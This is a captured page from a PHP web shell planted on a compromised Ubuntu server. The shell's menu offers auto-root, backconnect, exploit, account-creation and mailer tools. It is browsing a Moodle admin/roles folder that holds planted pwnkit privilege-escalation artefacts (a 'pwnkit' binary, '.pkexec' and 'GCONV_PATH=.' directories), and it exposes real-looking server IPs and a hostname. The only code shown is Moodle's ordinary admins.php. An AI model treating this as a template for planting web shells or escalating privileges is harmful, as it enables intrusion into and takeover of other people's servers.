Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
admin /
roles /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admins.php
5.6
KB
-rwxrwxrwx
allow.php
2.47
KB
-rwxrwxrwx
assign.php
11.73
KB
-rwxrwxrwx
check.php
6.63
KB
-rwxrwxrwx
define.php
6.77
KB
-rwxrwxrwx
lib.php
68
KB
-rwxrwxrwx
manage.php
10.53
KB
-rwxrwxrwx
managetabs.php
1.66
KB
-rwxrwxrwx
module.js
6.51
KB
-rwxrwxrwx
override.php
6.66
KB
-rwxrwxrwx
permissions.php
8.63
KB
-rwxrwxrwx
permissions_forms.php
3.31
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
usersroles.php
8.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admins.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Lets you site administrators * * @package core * @subpackage role * @copyright 2010 Petr Skoda (skodak) http://skodak.org * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once(dirname(__FILE__) . '/../../config.php'); require_once($CFG->dirroot . '/' . $CFG->admin . '/roles/lib.php'); $confirmadd = optional_param('confirmadd', 0, PARAM_INT); $confirmdel = optional_param('confirmdel', 0, PARAM_INT); $PAGE->set_url('/admin/roles/admins.php'); admin_externalpage_setup('admins'); if (!is_siteadmin()) { die; } $admisselector = new admins_existing_selector(); $admisselector->set_extra_fields(array('username', 'email')); $potentialadmisselector = new admins_potential_selector(); $potentialadmisselector->set_extra_fields(array('username', 'email')); if (optional_param('add', false, PARAM_BOOL) and confirm_sesskey()) { if ($userstoadd = $potentialadmisselector->get_selected_users()) { $user = reset($userstoadd); $username = fullname($user) . " ($user->username, $user->email)"; echo $OUTPUT->header(); echo $OUTPUT->confirm(get_string('confirmaddadmin', 'role', $username), new moodle_url('/admin/roles/admins.php', array('confirmadd'=>$user->id, 'sesskey'=>sesskey())), $PAGE->url); echo $OUTPUT->footer(); die; } } else if (optional_param('remove', false, PARAM_BOOL) and confirm_sesskey()) { if ($userstoremove = $admisselector->get_selected_users()) { $user = reset($userstoremove); if ($USER->id == $user->id) { //can not remove self } else { $username = fullname($user) . " ($user->username, $user->email)"; echo $OUTPUT->header(); echo $OUTPUT->confirm(get_string('confirmdeladmin', 'role', $username), new moodle_url('/admin/roles/admins.php', array('confirmdel'=>$user->id, 'sesskey'=>sesskey())), $PAGE->url); echo $OUTPUT->footer(); die; } } } else if (optional_param('main', false, PARAM_BOOL) and confirm_sesskey()) { if ($newmain = $admisselector->get_selected_users()) { $newmain = reset($newmain); $newmain = $newmain->id; $admins = array(); foreach(explode(',', $CFG->siteadmins) as $admin) { $admin = (int)$admin; if ($admin) { $admins[$admin] = $admin; } } if (isset($admins[$newmain])) { unset($admins[$newmain]); array_unshift($admins, $newmain); set_config('siteadmins', implode(',', $admins)); redirect($PAGE->url); } } } else if ($confirmadd and confirm_sesskey()) { $admins = array(); foreach(explode(',', $CFG->siteadmins) as $admin) { $admin = (int)$admin; if ($admin) { $admins[$admin] = $admin; } } $admins[$confirmadd] = $confirmadd; set_config('siteadmins', implode(',', $admins)); redirect($PAGE->url); } else if ($confirmdel and confirm_sesskey() and $confirmdel != $USER->id) { $admins = array(); foreach(explode(',', $CFG->siteadmins) as $admin) { $admin = (int)$admin; if ($admin) { $admins[$admin] = $admin; } } unset($admins[$confirmdel]); set_config('siteadmins', implode(',', $admins)); redirect($PAGE->url); } /// Print header echo $OUTPUT->header(); ?> <div id="addadmisform"> <h3 class="main"><?php print_string('manageadmins', 'role'); ?></h3> <form id="assignform" method="post" action="<?php echo $PAGE->url ?>"> <div> <input type="hidden" name="sesskey" value="<?php p(sesskey()); ?>" /> <table class="generaltable generalbox groupmanagementtable boxaligncenter" summary=""> <tr> <td id='existingcell'> <p> <label for="removeselect"><?php print_string('existingadmins', 'role'); ?></label> </p> <?php $admisselector->display(); ?> </td> <td id='buttonscell'> <p class="arrow_button"> <input name="add" id="add" type="submit" value="<?php echo $OUTPUT->larrow().' '.get_string('add'); ?>" title="<?php print_string('add'); ?>" /><br /> <input name="remove" id="remove" type="submit" value="<?php echo get_string('remove').' '.$OUTPUT->rarrow(); ?>" title="<?php print_string('remove'); ?>" /> <input name="main" id="main" type="submit" value="<?php echo get_string('mainadminset', 'role'); ?>" title="<?php print_string('mainadminset', 'role'); ?>" /> </p> </td> <td id='potentialcell'> <p> <label for="addselect"><?php print_string('users'); ?></label> </p> <?php $potentialadmisselector->display(); ?> </td> </tr> </table> </div> </form> </div> <?php //this must be after calling display() on the selectors so their setup JS executes first //////$PAGE->requires->js_function_call('init_add_remove_admis_page'); echo $OUTPUT->footer();
Close